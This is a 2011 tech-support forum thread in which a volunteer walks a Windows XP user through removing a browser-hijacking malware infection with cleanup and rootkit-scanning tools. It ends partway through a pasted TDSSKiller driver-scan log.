Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Multiple malware infestatioin?


  • Please log in to reply
19 replies to this topic

#1 Adam36

Adam36

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:11:33 PM

Posted 27 February 2011 - 09:13 PM

Hello, starting several weeks ago my wife informed me she couldn't upload pictures to shutter fly. After searching the internet for possible causes and I found that something had changed the proxy settings on IE. I fixed it, only to find it happen again the next day. I was able to fix it and then ran Malwarebytes. It found some malware and everything worked ok for a few weeks. Then it started again. Well I was busy so I didn't do anything about it for a week or so. Well I then was majorly infested. I wish I would of kept track of everything that was going on but I didn't. Some of the things were as follows. IE would not connect to the internet but Firefox would. When searching on Google it would go to random websites mostly selling Viagra. Would open up random tabs in Firefox. Would not let me run Malwarebytes. Would put the CPU at 100% with svchost.exe. When ever I would try to download it would just go blank. Would ask what program to use to open anything I tried to open and it wouldn't work.

Well I ended up using my laptop and downloading Rkill and malwarebytes on it. Then changing the name of malwarebytes to get it to run. I wish I would of kept track of what all it found, but it was a bunch. At this point I also downloaded superantispy and ran it, it found a whole bunch of stuff also. At this point I bought the malwarebytes protection module.

Everything is working better, but I still have things wrong. First off I keep getting the "malwarebytes successfully blocked access to a potential malicious website (with an IP address) type: outgoing" Next I still cant log onto IE, I can get on the net thru Firefox. When I try to open IE it asks me what program to use to open it. It still goes to random sights when I do Google searches but not near as much. Also while typing this I have 23 mshta.exe running.

ugh what a mess - anyways, sorry so long, and I hope this isn't to confusing. Thanks for looking this over!

Oh yea, I am running windows XP.

BC AdBot (Login to Remove)

 


#2 Blade

Blade

    Strong in the Bleepforce


  • Site Admin
  • 12,702 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:US
  • Local time:12:33 AM

Posted 04 March 2011 - 04:56 PM

Hello.

Download TFC by OldTimer to your desktop.
(TFC only cleans temp folders. It will not clean URL history, prefetch, or cookies).
Close any open windows.
  • Double click the TFC icon to run the program
  • TFC will close all open programs itself in order to run,
  • Click the Start button to begin the process.
  • Allow TFC to run uninterrupted.
  • The program should not take long to finish it's job.
Once its finished it should automatically reboot your machine, if it doesn't, manually reboot to ensure a complete clean

NOTE:
It's normal after running TFC that the PC will be slower to boot the first time.

TFC (Temp File Cleaner) will clear out all temp folders for all user accounts (temp, IE temp, java, FF, Opera, Chrome, Safari), including Administrator, All Users, LocalService, NetworkService, and any other accounts in the user folder.


***************************************************

Please download and scan with SUPERAntiSpyware Free
  • Double-click SUPERAntiSypware.exe and use the default settings for installation.
  • An icon will be created on your desktop. Double-click that icon to launch the program.
  • If it will not start, go to Start > All Prgrams > SUPERAntiSpyware and click on Alternate Start.
  • If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from here. Double-click on the hyperlink for Download Installer and save SASDEFINITIONS.EXE to your desktop. Then double-click on SASDEFINITIONS.EXE to install the definitions.)
  • In the Main Menu, click the Preferences... button.
  • Click the "General and Startup" tab, and under Start-up Options, make sure "Start SUPERAntiSpyware when Windows starts" box is unchecked.
  • Click the "Scanning Control" tab, and under Scanner Options, make sure the following are checked (uncheck all others):
    • Close browsers before scanning.
    • Scan for tracking cookies.
    • Terminate memory threats before quarantining.
  • Click the "Close" button to leave the control center screen and exit the program.
  • Do not run a scan just yet.
Reboot your computer in "Safe Mode" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode". When logging in, log in under the account that you normally use; do NOT log in under the account titled "Admin" or "Administrator" unless this account is the one used normally.

Scan with SUPERAntiSpyware as follows:
  • Launch the program and back on the main screen, under "Scan for Harmful Software" click Scan your computer.
  • On the left, make sure you check C:\Fixed Drive.
  • On the right, under "Complete Scan", choose Perform Complete Scan and click "Next".
  • After the scan is complete, a Scan Summary box will appear with potentially harmful items that were detected. Click "OK".
  • Make sure everything has a checkmark next to it and click "Next".
  • A notification will appear that "Quarantine and Removal is Complete". Click "OK" and then click the "Finish" button to return to the main menu.
  • If asked if you want to reboot, click "Yes" and reboot normally.
  • To retrieve the removal information after reboot, launch SUPERAntispyware again.
    • Click Preferences, then click the Statistics/Logs tab.
    • Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    • If there are several logs, click the current dated log and press View log. A text file will open in your default text editor.
    • Please copy and paste the Scan Log results in your next reply.
  • Click Close to exit the program.

~Blade


In your next reply, please include the following:
SUPERAntiSpyware Log
How is the computer running now?

Posted Image

If I am helping you, it has been 48 hours since your last post, and I have yet to reply to your topic, please send me a PM
Become a BleepingComputer fan: Facebook
Follow us on Twitter!
Circle us on Google+


#3 Adam36

Adam36
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:11:33 PM

Posted 07 March 2011 - 08:46 PM

Hello Blade

I had to download TFC to my lap top and then move it over on a memory stick. I tried to run it, but it would just freeze up. I let it sit for over 30 minutes and when I opened the task manager to see what was going on, I found it said TFC was not responding in the application tab. The only way I could close it was to manually turn off the computer by holding the power button. I tried this a few times, every time was the same.

I already have superantispyware, so I updated it and followed your instructions. Once I rebooted it and went to get the logs, they are not there? I tried it a couple times (takes almost 1.5 hrs to run it) and I have no logs of anything? I was able to find the log while in safe mode, The report said it didn't find anything. I tried to copy and past it to notebook, and then save it. Once out of safe mode it is not where I left it?

Thanks again for the help!!!


Adam

#4 Blade

Blade

    Strong in the Bleepforce


  • Site Admin
  • 12,702 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:US
  • Local time:12:33 AM

Posted 08 March 2011 - 11:18 AM

Hello.

Don't worry about the SUPERAntiSpyware Log. . . if it didn't find anything then that's fine.

Please download the TDSS Rootkit Removing Tool (TDSSKiller.exe) and save it to your Desktop. <-Important!!!
Be sure to download TDSSKiller.exe from Kaspersky's website and not TDSSKiller.zip which appears to be an older version 2.3.2.2 of the tool.
  • Double-click on TDSSKiller.exe to run the tool for known TDSS variants.
    Vista/Windows 7 users right-click and select Run As Administrator.
  • If TDSSKiller does not run, try renaming it.
  • To do this, right-click on TDSSKiller.exe, select Rename and give it a random name with the .com file extension (i.e. 123abc.com). If you do not see the file extension, please refer to How to change the file extension.
  • Click the Start Scan button.
  • Do not use the computer during the scan
  • If the scan completes with nothing found, click Close to exit.
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
  • Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.
  • A log file named TDSSKiller_version_date_time_log.txt (i.e. TDSSKiller.2.4.0.0_27.07.2010_09.o7.26_log.txt) will be created and saved to the root directory (usually Local Disk C:).
  • Copy and paste the contents of that file in your next reply.

In your next reply, please include the following:
TDSSKiller Log

Edited by Blade Zephon, 08 March 2011 - 11:20 AM.

Posted Image

If I am helping you, it has been 48 hours since your last post, and I have yet to reply to your topic, please send me a PM
Become a BleepingComputer fan: Facebook
Follow us on Twitter!
Circle us on Google+


#5 Adam36

Adam36
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Local time:11:33 PM

Posted 08 March 2011 - 07:29 PM

2011/03/08 19:16:57.0218 2740 TDSS rootkit removing tool 2.4.20.0 Mar 2 2011 10:44:30
2011/03/08 19:16:57.0546 2740 ================================================================================
2011/03/08 19:16:57.0546 2740 SystemInfo:
2011/03/08 19:16:57.0546 2740
2011/03/08 19:16:57.0546 2740 OS Version: 5.1.2600 ServicePack: 3.0
2011/03/08 19:16:57.0546 2740 Product type: Workstation
2011/03/08 19:16:57.0546 2740 ComputerName: HOMEPC
2011/03/08 19:16:57.0546 2740 UserName: Owner
2011/03/08 19:16:57.0546 2740 Windows directory: C:\WINDOWS
2011/03/08 19:16:57.0546 2740 System windows directory: C:\WINDOWS
2011/03/08 19:16:57.0546 2740 Processor architecture: Intel x86
2011/03/08 19:16:57.0546 2740 Number of processors: 1
2011/03/08 19:16:57.0546 2740 Page size: 0x1000
2011/03/08 19:16:57.0546 2740 Boot type: Normal boot
2011/03/08 19:16:57.0546 2740 ================================================================================
2011/03/08 19:16:58.0343 2740 Initialize success
2011/03/08 19:17:31.0187 4896 ================================================================================
2011/03/08 19:17:31.0187 4896 Scan started
2011/03/08 19:17:31.0187 4896 Mode: Manual;
2011/03/08 19:17:31.0187 4896 ================================================================================
2011/03/08 19:17:32.0765 4896 ACPI (8fd99680a539792a30e97944fdaecf17) C:\WINDOWS\system32\DRIVERS\ACPI.sys
2011/03/08 19:17:32.0968 4896 ACPIEC (9859c0f6936e723e4892d7141b1327d5) C:\WINDOWS\system32\drivers\ACPIEC.sys
2011/03/08 19:17:33.0062 4896 aec (8bed39e3c35d6a489438b8141717a557) C:\WINDOWS\system32\drivers\aec.sys
2011/03/08 19:17:33.0156 4896 AFD (7e775010ef291da96ad17ca4b17137d7) C:\WINDOWS\System32\drivers\afd.sys
2011/03/08 19:17:33.0562 4896 Arp1394 (b5b8a80875c1dededa8b02765642c32f) C:\WINDOWS\system32\DRIVERS\arp1394.sys
2011/03/08 19:17:33.0843 4896 ASCTRM (d880831279ed91f9a4190a2db9539ea9) C:\WINDOWS\system32\drivers\ASCTRM.sys
2011/03/08 19:17:33.0953 4896 AsyncMac (b153affac761e7f5fcfa822b9c4e97bc) C:\WINDOWS\system32\DRIVERS\asyncmac.sys
2011/03/08 19:17:33.0984 4896 atapi (9f3a2f5aa6875c72bf062c712cfa2674) C:\WINDOWS\system32\DRIVERS\atapi.sys
2011/03/08 19:17:34.0046 4896 Atmarpc (9916c1225104ba14794209cfa8012159) C:\WINDOWS\system32\DRIVERS\atmarpc.sys
2011/03/08 19:17:34.0109 4896 audstub (d9f724aa26c010a217c97606b160ed68) C:\WINDOWS\system32\DRIVERS\audstub.sys
2011/03/08 19:17:34.0218 4896 avgio (0b497c79824f8e1bf22fa6aacd3de3a0) C:\Program Files\Avira\AntiVir Desktop\avgio.sys
2011/03/08 19:17:34.0234 4896 avgntflt (47b879406246ffdced59e18d331a0e7d) C:\WINDOWS\system32\DRIVERS\avgntflt.sys
2011/03/08 19:17:34.0281 4896 avipbb (da39805e2bad99d37fce9477dd94e7f2) C:\WINDOWS\system32\DRIVERS\avipbb.sys
2011/03/08 19:17:34.0328 4896 Beep (da1f27d85e0d1525f6621372e7b685e9) C:\WINDOWS\system32\drivers\Beep.sys
2011/03/08 19:17:34.0406 4896 cbidf2k (90a673fc8e12a79afbed2576f6a7aaf9) C:\WINDOWS\system32\drivers\cbidf2k.sys
2011/03/08 19:17:34.0421 4896 CCDECODE (0be5aef125be881c4f854c554f2b025c) C:\WINDOWS\system32\DRIVERS\CCDECODE.sys
2011/03/08 19:17:34.0484 4896 Cdaudio (c1b486a7658353d33a10cc15211a873b) C:\WINDOWS\system32\drivers\Cdaudio.sys
2011/03/08 19:17:34.0515 4896 Cdfs (c885b02847f5d2fd45a24e219ed93b32) C:\WINDOWS\system32\drivers\Cdfs.sys
2011/03/08 19:17:34.0546 4896 Cdrom (1f4260cc5b42272d71f79e570a27a4fe) C:\WINDOWS\system32\DRIVERS\cdrom.sys
2011/03/08 19:17:34.0750 4896 DCamUSBEMPIA (f7d785ba9d167bdb0b9b19f79b220aca) C:\WINDOWS\system32\DRIVERS\emDevice.sys
2011/03/08 19:17:34.0796 4896 Disk (044452051f3e02e7963599fc8f4f3e25) C:\WINDOWS\system32\DRIVERS\disk.sys
2011/03/08 19:17:34.0875 4896 dmboot (d992fe1274bde0f84ad826acae022a41) C:\WINDOWS\system32\drivers\dmboot.sys
2011/03/08 19:17:34.0953 4896 dmio (7c824cf7bbde77d95c08005717a95f6f) C:\WINDOWS\system32\drivers\dmio.sys
2011/03/08 19:17:35.0015 4896 dmload (e9317282a63ca4d188c0df5e09c6ac5f) C:\WINDOWS\system32\drivers\dmload.sys
2011/03/08 19:17:35.0062 4896 DMusic (8a208dfcf89792a484e76c40e5f50b45) C:\WINDOWS\system32\drivers\DMusic.sys
2011/03/08 19:17:35.0156 4896 drmkaud (8f5fcff8e8848afac920905fbd9d33c8) C:\WINDOWS\system32\drivers\drmkaud.sys
2011/03/08 19:17:35.0218 4896 E100B (7d91dc6342248369f94d6eba0cf42e99) C:\WINDOWS\system32\DRIVERS\e100b325.sys
2011/03/08 19:17:35.0281 4896 Fastfat (38d332a6d56af32635675f132548343e) C:\WINDOWS\system32\drivers\Fastfat.sys
2011/03/08 19:17:35.0312 4896 Fdc (92cdd60b6730b9f50f6a1a0c1f8cdc81) C:\WINDOWS\system32\DRIVERS\fdc.sys
2011/03/08 19:17:35.0359 4896 FilterService (1edc0df2da14e04504dd3bac21aa32cd) C:\WINDOWS\system32\DRIVERS\lvuvcflt.sys
2011/03/08 19:17:35.0421 4896 FiltUSBEMPIA (b69f7a37617dee2c1a5f6dabd0972e6e) C:\WINDOWS\system32\DRIVERS\emFilter.sys
2011/03/08 19:17:35.0453 4896 Fips (d45926117eb9fa946a6af572fbe1caa3) C:\WINDOWS\system32\drivers\Fips.sys
2011/03/08 19:17:35.0484 4896 Flpydisk (9d27e7b80bfcdf1cdd9b555862d5e7f0) C:\WINDOWS\system32\drivers\Flpydisk.sys
2011/03/08 19:17:35.0515 4896 FltMgr (b2cf4b0786f8212cb92ed2b50c6db6b0) C:\WINDOWS\system32\drivers\fltmgr.sys
2011/03/08 19:17:35.0562 4896 Fs_Rec (3e1e2bd4f39b0e2b7dc4f4d2bcc2779a) C:\WINDOWS\system32\drivers\Fs_Rec.sys
2011/03/08 19:17:35.0609 4896 Ftdisk (6ac26732762483366c3969c9e4d2259d) C:\WINDOWS\system32\DRIVERS\ftdisk.sys
2011/03/08 19:17:35.0671 4896 Gpc (0a02c63c8b144bd8c86b103dee7c86a2) C:\WINDOWS\system32\DRIVERS\msgpc.sys
2011/03/08 19:17:35.0703 4896 HdAudAddService (160b24fd894e79e71c983ea403a6e6e7) C:\WINDOWS\system32\drivers\HdAudio.sys
2011/03/08 19:17:35.0765 4896 HDAudBus (573c7d0a32852b48f3058cfd8026f511) C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
2011/03/08 19:17:35.0796 4896 HidUsb (ccf82c5ec8a7326c3066de870c06daf1) C:\WINDOWS\system32\DRIVERS\hidusb.sys
2011/03/08 19:17:35.0906 4896 HSFHWBS2 (128ef741b2293c36810561092b566b1c) C:\WINDOWS\system32\DRIVERS\HSFHWBS2.sys
2011/03/08 19:17:36.0000 4896 HSF_DP (9a0d0c461ef2b3d80cb7875b4b995e47) C:\WINDOWS\system32\DRIVERS\HSF_DP.sys
2011/03/08 19:17:36.0109 4896 HTTP (f80a415ef82cd06ffaf0d971528ead38) C:\WINDOWS\system32\Drivers\HTTP.sys
2011/03/08 19:17:36.0187 4896 i8042prt (4a0b06aa8943c1e332520f7440c0aa30) C:\WINDOWS\system32\DRIVERS\i8042prt.sys
2011/03/08 19:17:36.0296 4896 ialm (2858e04751178a47223e0c5ce495478a) C:\WINDOWS\system32\DRIVERS\ialmnt5.sys
2011/03/08 19:17:36.0359 4896 Imapi (083a052659f5310dd8b6a6cb05edcf8e) C:\WINDOWS\system32\DRIVERS\imapi.sys
2011/03/08 19:17:36.0531 4896 IntcAzAudAddService (6a00e322875e3b3a074ad6d45e7b7e36) C:\WINDOWS\system32\drivers\RtkHDAud.sys
2011/03/08 19:17:36.0703 4896 IntelIde (b5466a9250342a7aa0cd1fba13420678) C:\WINDOWS\system32\DRIVERS\intelide.sys
2011/03/08 19:17:36.0765 4896 intelppm (8c953733d8f36eb2133f5bb58808b66b) C:\WINDOWS\system32\DRIVERS\intelppm.sys
2011/03/08 19:17:36.0796 4896 Ip6Fw (3bb22519a194418d5fec05d800a19ad0) C:\WINDOWS\system32\drivers\ip6fw.sys
2011/03/08 19:17:36.0859 4896 IpFilterDriver (731f22ba402ee4b62748adaf6363c182) C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
2011/03/08 19:17:36.0906 4896 IpInIp (b87ab476dcf76e72010632b5550955f5) C:\WINDOWS\system32\DRIVERS\ipinip.sys
2011/03/08 19:17:36.0953 4896 IpNat (cc748ea12c6effde940ee98098bf96bb) C:\WINDOWS\system32\DRIVERS\ipnat.sys
2011/03/08 19:17:36.0984 4896 IPSec (23c74d75e36e7158768dd63d92789a91) C:\WINDOWS\system32\DRIVERS\ipsec.sys
2011/03/08 19:17:37.0031 4896 IRENUM (c93c9ff7b04d772627a3646d89f7bf89) C:\WINDOWS\system32\DRIVERS\irenum.sys
2011/03/08 19:17:37.0046 4896 isapnp (05a299ec56e52649b1cf2fc52d20f2d7) C:\WINDOWS\system32\DRIVERS\isapnp.sys
2011/03/08 19:17:37.0109 4896 Kbdclass (463c1ec80cd17420a542b7f36a36f128) C:\WINDOWS\system32\DRIVERS\kbdclass.sys
2011/03/08 19:17:37.0140 4896 kbdhid (9ef487a186dea361aa06913a75b3fa99) C:\WINDOWS\system32\DRIVERS\kbdhid.sys
2011/03/08 19:17:37.0187 4896 kmixer (692bcf44383d056aed41b045a323d378) C:\WINDOWS\system32\drivers\kmixer.sys
2011/03/08 19:17:37.0234 4896 KSecDD (b467646c54cc746128904e1654c750c1) C:\WINDOWS\system32\drivers\KSecDD.sys
2011/03/08 19:17:37.0343 4896 LVPr2Mon (f96cfb47903854f228baaf3e2d41a0a3) C:\WINDOWS\system32\DRIVERS\LVPr2Mon.sys
2011/03/08 19:17:37.0453 4896 LVRS (e22fd7852e74f04cceb6b8a684a51f3e) C:\WINDOWS\system32\DRIVERS\lvrs.sys
2011/03/08 19:17:37.0515 4896 LVUSBSta (5f987fc1aad215ec2c60cf07719b1cce) C:\WINDOWS\system32\drivers\LVUSBSta.sys
2011/03/08 19:17:37.0718 4896 LVUVC (e89df2b88ee659954de79827ddf46dc9) C:\WINDOWS\system32\DRIVERS\lvuvc.sys
2011/03/08 19:17:38.0031 4896 MBAMProtector (836e0e09ca9869be7eb39ef2cf3602c7) C:\WINDOWS\system32\drivers\mbam.sys
2011/03/08 19:17:38.0093 4896 mdmxsdk (5110edd87e2508f02b922e83a2487dfc) C:\WINDOWS\system32\DRIVERS\mdmxsdk.sys
2011/03/08 19:17:38.0125 4896 mnmdd (4ae068242760a1fb6e1a44bf4e16afa6) C:\WINDOWS\system32\drivers\mnmdd.sys
2011/03/08 19:17:38.0203 4896 Modem (dfcbad3cec1c5f964962ae10e0bcc8e1) C:\WINDOWS\system32\drivers\Modem.sys
2011/03/08 19:17:38.0234 4896 Mouclass (35c9e97194c8cfb8430125f8dbc34d04) C:\WINDOWS\system32\DRIVERS\mouclass.sys
2011/03/08 19:17:38.0281 4896 mouhid (b1c303e17fb9d46e87a98e4ba6769685) C:\WINDOWS\system32\DRIVERS\mouhid.sys
2011/03/08 19:17:38.0328 4896 MountMgr (a80b9a0bad1b73637dbcbba7df72d3fd) C:\WINDOWS\system32\drivers\MountMgr.sys
2011/03/08 19:17:38.0359 4896 MPE (c0f8e0c2c3c0437cf37c6781896dc3ec) C:\WINDOWS\system32\DRIVERS\MPE.sys
2011/03/08 19:17:38.0453 4896 MRxDAV (11d42bb6206f33fbb3ba0288d3ef81bd) C:\WINDOWS\system32\DRIVERS\mrxdav.sys
2011/03/08 19:17:38.0531 4896 MRxSmb (f3aefb11abc521122b67095044169e98) C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
2011/03/08 19:17:38.0593 4896 Msfs (c941ea2454ba8350021d774daf0f1027) C:\WINDOWS\system32\drivers\Msfs.sys
2011/03/08 19:17:38.0625 4896 MSKSSRV (d1575e71568f4d9e14ca56b7b0453bf1) C:\WINDOWS\system32\drivers\MSKSSRV.sys
2011/03/08 19:17:38.0656 4896 MSPCLOCK (325bb26842fc7ccc1fcce2c457317f3e) C:\WINDOWS\system32\drivers\MSPCLOCK.sys
2011/03/08 19:17:38.0687 4896 MSPQM (bad59648ba099da4a17680b39730cb3d) C:\WINDOWS\system32\drivers\MSPQM.sys
2011/03/08 19:17:38.0750 4896 mssmbios (af5f4f3f14a8ea2c26de30f7a1e17136) C:\WINDOWS\system32\DRIVERS\mssmbios.sys
2011/03/08 19:17:38.0781 4896 MSTEE (e53736a9e30c45fa9e7b5eac55056d1d) C:\WINDOWS\system32\drivers\MSTEE.sys
2011/03/08 19:17:38.0812 4896 Mup (2f625d11385b1a94360bfc70aaefdee1) C:\WINDOWS\system32\drivers\Mup.sys
2011/03/08 19:17:38.0843 4896 MxlW2k (88f57a15b786bf2af9458f7903768085) C:\WINDOWS\system32\drivers\MxlW2k.sys
2011/03/08 19:17:38.0875 4896 NABTSFEC (5b50f1b2a2ed47d560577b221da734db) C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys
2011/03/08 19:17:38.0937 4896 NDIS (1df7f42665c94b825322fae71721130d) C:\WINDOWS\system32\drivers\NDIS.sys
2011/03/08 19:17:38.0968 4896 NdisIP (7ff1f1fd8609c149aa432f95a8163d97) C:\WINDOWS\system32\DRIVERS\NdisIP.sys
2011/03/08 19:17:39.0015 4896 NdisTapi (1ab3d00c991ab086e69db84b6c0ed78f) C:\WINDOWS\system32\DRIVERS\ndistapi.sys
2011/03/08 19:17:39.0046 4896 Ndisuio (f927a4434c5028758a842943ef1a3849) C:\WINDOWS\system32\DRIVERS\ndisuio.sys
2011/03/08 19:17:39.0078 4896 NdisWan (edc1531a49c80614b2cfda43ca8659ab) C:\WINDOWS\system32\DRIVERS\ndiswan.sys
2011/03/08 19:17:39.0140 4896 NDProxy (9282bd12dfb069d3889eb3fcc1000a9b) C:\WINDOWS\system32\drivers\NDProxy.sys
2011/03/08 19:17:39.0171 4896 NetBIOS (5d81cf9a2f1a3a756b66cf684911cdf0) C:\WINDOWS\system32\DRIVERS\netbios.sys
2011/03/08 19:17:39.0218 4896 NetBT (74b2b2f5bea5e9a3dc021d685551bd3d) C:\WINDOWS\system32\DRIVERS\netbt.sys
2011/03/08 19:17:39.0281 4896 NIC1394 (e9e47cfb2d461fa0fc75b7a74c6383ea) C:\WINDOWS\system32\DRIVERS\nic1394.sys
2011/03/08 19:17:39.0328 4896 Npfs (3182d64ae053d6fb034f44b6def8034a) C:\WINDOWS\system32\drivers\Npfs.sys
2011/03/08 19:17:39.0359 4896 Ntfs (78a08dd6a8d65e697c18e1db01c5cdca) C:\WINDOWS\system32\drivers\Ntfs.sys
2011/03/08 19:17:39.0453 4896 Null (73c1e1f395918bc2c6dd67af7591a3ad) C:\WINDOWS\system32\drivers\Null.sys
2011/03/08 19:17:39.0500 4896 NwlnkFlt (b305f3fad35083837ef46a0bbce2fc57) C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
2011/03/08 19:17:39.0531 4896 NwlnkFwd (c99b3415198d1aab7227f2c88fd664b9) C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
2011/03/08 19:17:39.0578 4896 ohci1394 (ca33832df41afb202ee7aeb05145922f) C:\WINDOWS\system32\DRIVERS\ohci1394.sys
2011/03/08 19:17:39.0625 4896 Parport (5575faf8f97ce5e713d108c2a58d7c7c) C:\WINDOWS\system32\DRIVERS\parport.sys
2011/03/08 19:17:39.0640 4896 PartMgr (beb3ba25197665d82ec7065b724171c6) C:\WINDOWS\system32\drivers\PartMgr.sys
2011/03/08 19:17:39.0703 4896 ParVdm (70e98b3fd8e963a6a46a2e6247e0bea1) C:\WINDOWS\system32\drivers\ParVdm.sys
2011/03/08 19:17:39.0718 4896 PCI (a219903ccf74233761d92bef471a07b1) C:\WINDOWS\system32\DRIVERS\pci.sys
2011/03/08 19:17:39.0781 4896 PCIIde (ccf5f451bb1a5a2a522a76e670000ff0) C:\WINDOWS\system32\DRIVERS\pciide.sys
2011/03/08 19:17:39.0828 4896 Pcmcia (9e89ef60e9ee05e3f2eef2da7397f1c1) C:\WINDOWS\system32\drivers\Pcmcia.sys
2011/03/08 19:17:40.0031 4896 PptpMiniport (efeec01b1d3cf84f16ddd24d9d9d8f99) C:\WINDOWS\system32\DRIVERS\raspptp.sys
2011/03/08 19:17:40.0062 4896 PSched (09298ec810b07e5d582cb3a3f9255424) C:\WINDOWS\system32\DRIVERS\psched.sys
2011/03/08 19:17:40.0093 4896 Ptilink (80d317bd1c3dbc5d4fe7b1678c60cadd) C:\WINDOWS\system32\DRIVERS\ptilink.sys
2011/03/08 19:17:40.0140 4896 PxHelp20 (49452bfcec22f36a7a9b9c2181bc3042) C:\WINDOWS\system32\Drivers\PxHelp20.sys
2011/03/08 19:17:40.0265 4896 RasAcd (fe0d99d6f31e4fad8159f690d68ded9c) C:\WINDOWS\system32\DRIVERS\rasacd.sys
2011/03/08 19:17:40.0296 4896 Rasl2tp (11b4a627bc9614b885c4969bfa5ff8a6) C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
2011/03/08 19:17:40.0328 4896 RasPppoe (5bc962f2654137c9909c3d4603587dee) C:\WINDOWS\system32\DRIVERS\raspppoe.sys
2011/03/08 19:17:40.0375 4896 Raspti (fdbb1d60066fcfbb7452fd8f9829b242) C:\WINDOWS\system32\DRIVERS\raspti.sys
2011/03/08 19:17:40.0406 4896 Rdbss (7ad224ad1a1437fe28d89cf22b17780a) C:\WINDOWS\system32\DRIVERS\rdbss.sys
2011/03/08 19:17:40.0453 4896 RDPCDD (4912d5b403614ce99c28420f75353332) C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
2011/03/08 19:17:40.0500 4896 RDPWD (6728e45b66f93c08f11de2e316fc70dd) C:\WINDOWS\system32\drivers\RDPWD.sys
2011/03/08 19:17:40.0531 4896 redbook (f828dd7e1419b6653894a8f97a0094c5) C:\WINDOWS\system32\DRIVERS\redbook.sys
2011/03/08 19:17:40.0656 4896 SASDIFSV (a3281aec37e0720a2bc28034c2df2a56) C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
2011/03/08 19:17:40.0671 4896 SASKUTIL (61db0d0756a99506207fd724e3692b25) C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
2011/03/08 19:17:40.0734 4896 ScanUSBEMPIA (7bfa395a95e5d714d222e35f041c46e8) C:\WINDOWS\system32\DRIVERS\emScan.sys
2011/03/08 19:17:40.0796 4896 Secdrv (90a3935d05b494a5a39d37e71f09a677) C:\WINDOWS\system32\DRIVERS\secdrv.sys
2011/03/08 19:17:40.0859 4896 serenum (0f29512ccd6bead730039fb4bd2c85ce) C:\WINDOWS\system32\DRIVERS\serenum.sys
2011/03/08 19:17:40.0906 4896 Serial (cca207a8896d4c6a0c9ce29a4ae411a7) C:\WINDOWS\system32\DRIVERS\serial.sys
2011/03/08 19:17:40.0968 4896 Sfloppy (8e6b8c671615d126fdc553d1e2de5562) C:\WINDOWS\system32\DRIVERS\sfloppy.sys
2011/03/08 19:17:41.0031 4896 SLIP (866d538ebe33709a5c9f5c62b73b7d14) C:\WINDOWS\system32\DRIVERS\SLIP.sys
2011/03/08 19:17:41.0109 4896 splitter (ab8b92451ecb048a4d1de7c3ffcb4a9f) C:\WINDOWS\system32\drivers\splitter.sys
2011/03/08 19:17:41.0140 4896 sr (76bb022c2fb6902fd5bdd4f78fc13a5d) C:\WINDOWS\system32\DRIVERS\sr.sys
2011/03/08 19:17:41.0203 4896 Srv (0f6aefad3641a657e18081f52d0c15af) C:\WINDOWS\system32\DRIVERS\srv.sys
2011/03/08 19:17:41.0281 4896 ssmdrv (a36ee93698802cd899f98bfd553d8185) C:\WINDOWS\system32\DRIVERS\ssmdrv.sys
2011/03/08 19:17:41.0328 4896 streamip (77813007ba6265c4b6098187e6ed79d2) C:\WINDOWS\system32\DRIVERS\StreamIP.sys
2011/03/08 19:17:41.0375 4896 SunkFilt (d8cbd8b4bf4dc9cd64b5cc8e2bec1b96) C:\WINDOWS\System32\Drivers\sunkfilt.sys
2011/03/08 19:17:41.0421 4896 SunkFilt39 (fabcc3bec89a2853958cefb28943c470) C:\WINDOWS\System32\Drivers\sunkfilt39.sys
2011/03/08 19:17:41.0468 4896 swenum (3941d127aef12e93addf6fe6ee027e0f) C:\WINDOWS\system32\DRIVERS\swenum.sys
2011/03/08 19:17:41.0531 4896 swmidi (8ce882bcc6cf8a62f2b2323d95cb3d01) C:\WINDOWS\system32\drivers\swmidi.sys
2011/03/08 19:17:42.0187 4896 sysaudio (8b83f3ed0f1688b4958f77cd6d2bf290) C:\WINDOWS\system32\drivers\sysaudio.sys
2011/03/08 19:17:42.0390 4896 Tcpip (9aefa14bd6b182d61e3119fa5f436d3d) C:\WINDOWS\system32\DRIVERS\tcpip.sys
2011/03/08 19:17:42.0437 4896 TDPIPE (6471a66807f5e104e4885f5b67349397) C:\WINDOWS\system32\drivers\TDPIPE.sys
2011/03/08 19:17:42.0468 4896 TDTCP (c56b6d0402371cf3700eb322ef3aaf61) C:\WINDOWS\system32\drivers\TDTCP.sys
2011/03/08 19:17:42.0515 4896 TermDD (88155247177638048422893737429d9e) C:\WINDOWS\system32\DRIVERS\termdd.sys
2011/03/08 19:17:42.0593 4896 Udfs (5787b80c2e3c5e2f56c2a233d91fa2c9) C:\WINDOWS\system32\drivers\Udfs.sys
2011/03/08 19:17:42.0687 4896 Update (402ddc88356b1bac0ee3dd1580c76a31) C:\WINDOWS\system32\DRIVERS\update.sys
2011/03/08 19:17:42.0750 4896 USB28xxBGA (68a00f7bd18bc3af2d98a75142e1c74e) C:\WINDOWS\system32\DRIVERS\emBDA.sys
